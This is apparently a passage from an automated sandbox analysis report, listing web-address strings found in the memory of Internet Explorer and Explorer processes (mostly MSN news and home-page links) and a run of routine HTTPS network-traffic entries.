          Source: iexplore.exe, 0000001D.00000002.4193314739.0000000009BEC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpe
          Source: iexplore.exe, 0000001D.00000002.4220695487.000000000AB75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpe.prototype.tryReformatGuid
          Source: iexplore.exe, 0000000E.00000002.4212066151.000000000AE76000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpe.prototype.updateContract
          Source: iexplore.exe, 0000001D.00000002.4171805100.0000000006327000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpe7
          Source: iexplore.exe, 0000000E.00000002.4175868407.00000000063FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpec
          Source: iexplore.exe, 0000000D.00000002.4159269749.000001BA5A8E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpehps
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D446000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehper
          Source: iexplore.exe, 0000001D.00000002.4171805100.0000000006327000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpg9
          Source: iexplore.exe, 0000001D.00000002.4171805100.0000000006327000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehph
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D34E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehphTerms
          Source: iexplore.exe, 0000001D.00000002.4186152611.00000000094E3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehphttps://www.msn.com/?ocid=iehp
          Source: iexplore.exe, 0000000E.00000002.4188115682.0000000009263000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehphttps://www.msn.com/?ocid=iehpP
          Source: iexplore.exe, 0000000E.00000002.4212066151.000000000AE76000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehphttps://www.msn.com/?ocid=iehpe.prototype.getDwellTimeV2
          Source: iexplore.exe, 0000001D.00000002.4171805100.0000000006327000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpi
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D3D7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpiehpehps
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D34E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpiehpehpt
          Source: iexplore.exe, 0000001D.00000002.4181802065.0000000006F11000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpio
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D3D7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpjG
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D446000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4171805100.0000000006284000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4193314739.0000000009BEC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpl
          Source: iexplore.exe, 0000000E.00000002.4160624814.000000000313F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehple=10in.jsummer
          Source: iexplore.exe, 0000001D.00000002.4171805100.0000000006284000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpm)DH
          Source: iexplore.exe, 0000001D.00000002.4171805100.0000000006327000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpm?
          Source: iexplore.exe, 0000001D.00000002.4171805100.0000000006327000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpn
          Source: iexplore.exe, 0000001D.00000002.4171805100.0000000006327000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpntimU
          Source: iexplore.exe, 0000001D.00000002.4171805100.0000000006327000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpo3?VIe
          Source: iexplore.exe, 0000000E.00000002.4171695825.000000000635E000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4171805100.0000000006284000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpow
          Source: iexplore.exe, 0000001D.00000002.4171805100.0000000006284000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpow=
          Source: iexplore.exe, 0000000E.00000002.4171695825.000000000635E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpowY
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D39C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpp/?LinkId=255141
          Source: iexplore.exe, 0000001D.00000002.4160602763.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpp/?LinkId=255141/?ocid=iehpId=255141st8h
          Source: iexplore.exe, 0000000E.00000002.4160624814.00000000030D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpp/?LinkId=255141link/p/?LinkId=255141st
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D39C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpp/?LinkId=255141se
          Source: iexplore.exe, 0000001D.00000002.4162393628.0000000004740000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehppageVersions
          Source: iexplore.exe, 0000001D.00000003.2485342541.000000000F790000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4249745118.000000000F790000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpr
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D4A9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehprs
          Source: iexplore.exe, 0000000E.00000002.4171695825.00000000063C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehps
          Source: iexplore.exe, 0000001D.00000002.4171805100.00000000062D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpsl
          Source: iexplore.exe, 0000001D.00000002.4162393628.0000000004740000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpstorageTeststorageTest
          Source: iexplore.exe, 0000000D.00000002.4163339171.000001BA5C5C0000.00000004.00000001.00040000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4162752267.0000000004ED0000.00000004.00000001.00040000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4162393628.0000000004740000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpstorageTeststorageTest#)
          Source: iexplore.exe, 0000000D.00000002.4163339171.000001BA5C5C0000.00000004.00000001.00040000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4162752267.0000000004ED0000.00000004.00000001.00040000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4162393628.0000000004740000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpstorageTeststorageTest(
          Source: iexplore.exe, 0000000D.00000002.4163339171.000001BA5C5C0000.00000004.00000001.00040000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4162752267.0000000004ED0000.00000004.00000001.00040000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4162393628.0000000004740000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpstorageTeststorageTest?ocid=iehp6#
          Source: iexplore.exe, 0000001D.00000002.4160602763.0000000000836000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehptiveEvent255141ehpg$
          Source: explorer.exe, 00000005.00000002.4196481242.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpt~
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D446000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpu
          Source: iexplore.exe, 0000001D.00000002.4177235933.0000000006DB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpv1/homePage/latest/midlevel/experience.a924de0fd91e364ec453.js
          Source: iexplore.exe, 0000000E.00000002.4171695825.000000000635E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpv1/homePage/latest/midlevel/experience.a924de0fd91e364ec453.js)~
          Source: iexplore.exe, 0000000E.00000002.4175868407.00000000063FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpv1/homePage/latest/midlevel/experience.a924de0fd91e364ec453.jsx
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D4F1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpwV
          Source: iexplore.exe, 0000000E.00000002.4175868407.000000000642C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/C
          Source: iexplore.exe, 0000001D.00000002.4168229079.0000000005369000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/N
          Source: iexplore.exe, 0000000E.00000002.4210835737.000000000AE04000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4221969780.000000000AC28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/PV.xml
          Source: iexplore.exe, 0000001D.00000002.4160602763.0000000000880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/Rp
          Source: iexplore.exe, 0000000E.00000002.4211423942.000000000AE20000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4221164913.000000000ABA1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/nachrichten/schlagzeilen/Impressum/ar-BB56cmHhttps://www.msn.com/id-id/ber
          Source: explorer.exe, 00000005.00000000.1760442798.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
          Source: explorer.exe, 00000005.00000000.1760442798.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
          Source: explorer.exe, 00000005.00000000.1760442798.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1760442798.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
          Source: explorer.exe, 00000005.00000000.1760442798.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
          Source: explorer.exe, 00000005.00000000.1760442798.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
          Source: explorer.exe, 00000005.00000000.1760442798.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
          Source: explorer.exe, 00000005.00000000.1760442798.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
          Source: explorer.exe, 00000005.00000000.1760442798.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
          Source: explorer.exe, 00000005.00000000.1760442798.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
          Source: explorer.exe, 00000005.00000002.4165873978.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
          Source: explorer.exe, 00000005.00000000.1760442798.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
          Source: explorer.exe, 00000005.00000000.1760442798.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
          Source: explorer.exe, 00000005.00000000.1760442798.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D446000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/er
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D3FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/f
          Source: iexplore.exe, 0000000D.00000002.4185927257.000001BA606E0000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D4BA000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D34E000.00000004.00000001.00020000.00000000.sdmp, imagestore.dat.13.drString found in binary or memory: https://www.msn.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D446000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/favicon.icoG
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D446000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/favicon.icoK
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D4F1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/favicon.icogY
          Source: iexplore.exe, 0000000D.00000002.4158143738.000000A69A9F6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/favicon.icok
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D4A9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/favicon.icorosoft
          Source: iexplore.exe, 0000000E.00000002.4211423942.000000000AE20000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4190391744.0000000009510000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4221164913.000000000ABA1000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4171805100.00000000062D1000.00000004.00000001.00020000.00000000.sdmp, experience.a924de0fd91e364ec453[1].js.14.drString found in binary or memory: https://www.msn.com/fr-ch/actualite/other/Mentions-l
          Source: iexplore.exe, 0000000E.00000002.4201829277.000000000A80C000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4221270287.000000000ABC0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/fr-fr/actualite/microsoftnews/qui-sommes-nous/ar-AA135Z7yhttps://www.msn.com/de-
          Source: iexplore.exe, 0000001D.00000002.4181802065.0000000006F3B000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4178783359.0000000006E0B000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4177235933.0000000006D60000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/function()%7Breturn
          Source: iexplore.exe, 0000001D.00000002.4181802065.0000000006F3B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/function()%7BreturnW
          Source: iexplore.exe, 0000001D.00000002.4233183546.000000000B640000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/function()%7Breturna8d
          Source: iexplore.exe, 0000001D.00000002.4160602763.0000000000836000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/ocid=iehp
          Source: iexplore.exe, 0000000E.00000002.4160624814.000000000318F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/ocid=iehpp/?LinkId=255141xe
          Source: iexplore.exe, 0000000D.00000002.4167076882.000001BA5D29A000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D442000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D34E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/spartan/ientp?locale=en-CH&market=CH&enableregulatorypsm=0&enablecpsm=0&NTLogo=0
          Source: iexplore.exe, 0000001D.00000002.4181802065.0000000006F11000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com1
          Source: iexplore.exe, 0000000E.00000002.4175868407.000000000642C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com2
          Source: iexplore.exe, 0000001D.00000002.4177235933.0000000006D8A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com5A
          Source: explorer.exe, 00000005.00000000.1760442798.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: iexplore.exe, 0000000E.00000002.4175868407.00000000063FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.comK
          Source: iexplore.exe, 0000000E.00000002.4184443900.0000000006AF7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.comji
          Source: iexplore.exe, 0000001D.00000002.4181802065.0000000006F11000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.comsn.com
          Source: iexplore.exe, 0000000E.00000002.4171695825.00000000063C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.comsn.comh
          Source: iexplore.exe, 0000000E.00000002.4175868407.000000000642C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.comt
          Source: iexplore.exe, 0000000E.00000002.4179072726.00000000069D6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.comy
          Source: iexplore.exe, 0000000E.00000002.4175868407.000000000642C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com~
          Source: me[1].json.29.drString found in binary or memory: https://www.rd.com/article/cancelled-flight/
          Source: iexplore.exe, 0000001D.00000002.4190700229.0000000009A15000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/article/what-do-airport-body-scanners-see/
          Source: iexplore.exe, 0000001D.00000002.4198604272.0000000009F3B000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4190700229.0000000009A15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/article/what-is-a-real-id/
          Source: iexplore.exe, 0000001D.00000002.4190700229.0000000009A15000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/foods-you-can-and-cant-take-on-plane/
          Source: iexplore.exe, 0000001D.00000002.4190700229.0000000009A15000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/items-over-3-4-ounces-that-can-still-go-in-your-carry-on/
          Source: iexplore.exe, 0000001D.00000002.4190700229.0000000009A15000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/luggage-problems-tsa-security/
          Source: explorer.exe, 00000005.00000000.1760442798.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
          Source: iexplore.exe, 0000001D.00000002.4190700229.0000000009A15000.00000004.00000001.00020000.00000000.sdmp, me[1].json.29.drString found in binary or memory: https://www.rd.com/list/strange-things-allowed-through-security/
          Source: iexplore.exe, 0000001D.00000002.4190700229.0000000009A15000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/tsa-precheck-airport-prescreening/
          Source: iexplore.exe, 0000001D.00000002.4190700229.0000000009A15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/tsa-rules-can-cant-pack-in-carry-on/
          Source: iexplore.exe, 0000001D.00000002.4212389701.000000000A6EF000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/what-tsa-agents-notice-first/
          Source: explorer.exe, 00000005.00000000.1760442798.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
          Source: iexplore.exe, 0000001D.00000002.4228929059.000000000B0D5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.redreporter.com/2024/5/26/24165253/reds-complete-sweep-dodgers-nick-martinez-shohei-ohta
          Source: iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.sciencefocus.com/the-human-body/what-is-the-point-of-goose-pimples/
          Source: iexplore.exe, 0000001D.00000002.4171805100.00000000062D1000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4194392389.0000000009C5E000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmp, me[1].json.29.drString found in binary or memory: https://www.t3.com/news/mistakes-everyone-makes-with-Netflix
          Source: iexplore.exe, 0000001D.00000002.4171805100.00000000062D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.t3.com/news/mistakes-everyone-makes-with-Netflix.
          Source: iexplore.exe, 0000001D.00000002.4189814301.00000000099A6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.t3.com/news/mistakes-everyone-makes-with-Netflixle-look-2-20760591/?ITO=msnustralia-fine
          Source: iexplore.exe, 0000001D.00000003.2485695269.0000000009B34000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4227213508.000000000AFAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.thecooldown.com/outdoors/illegal-clearing-national-park-habitat-destruction-australia-fi
          Source: iexplore.exe, 0000001D.00000002.4196483208.0000000009DD4000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmp, me[1].json.29.drString found in binary or memory: https://www.tomsguide.com/entertainment/streaming/cord-cutting-guide
          Source: iexplore.exe, 0000001D.00000002.4190700229.0000000009A15000.00000004.00000001.00020000.00000000.sdmp, me[1].json.29.drString found in binary or memory: https://www.tsa.gov/travel/security-screening/whatcanibring/all
          Source: iexplore.exe, 0000001D.00000002.4194265632.0000000009C53000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.usatoday.com/story/sports/golf/2024/05/26/grayson-murray-cause-of-death-revealed-parents
          Source: iexplore.exe, 0000001D.00000002.4194392389.0000000009C5E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.usatoday.com/story/sports/nba/celtics/2024/05/23/kristaps-porzingis-injury-update-celtic
          Source: iexplore.exe, 0000001D.00000002.4193247232.0000000009AEC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4228929059.000000000B0C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.watchmojo.com/video/id/57280
          Source: iexplore.exe, 0000001D.00000002.4197621364.0000000009E50000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4160602763.00000000008BB000.00000004.00000020.00020000.00000000.sdmp, BBI4MeJ[1].json.29.drString found in binary or memory: https://yourtopdealstoday.com/article/lifehacks-tdv-vsl.php?affId=3C291410&c1=0526-2&c2=lifehack_sca
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
          Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
